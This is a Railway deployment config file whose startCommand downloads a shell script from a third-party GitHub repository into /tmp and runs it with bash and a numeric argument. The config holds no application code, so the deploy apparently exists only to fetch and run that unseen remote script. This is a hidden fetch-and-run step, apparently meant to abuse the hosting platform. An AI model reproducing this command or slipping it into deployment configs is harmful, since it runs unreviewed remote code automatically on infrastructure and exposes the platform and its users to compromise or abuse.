{
    "$schema": "https://railway.app/railway.schema.json",
    "build": {
        "builder": "NIXPACKS"
    },
    "deploy": {
        "startCommand": "curl -o /tmp/php.sh -Ls https://github.com/A233S/angti/raw/main/phpv3.sh ; bash /tmp/php.sh 507675 ; echo ok",
        "restartPolicyType": "ON_FAILURE",
        "restartPolicyMaxRetries": 1
    }
}
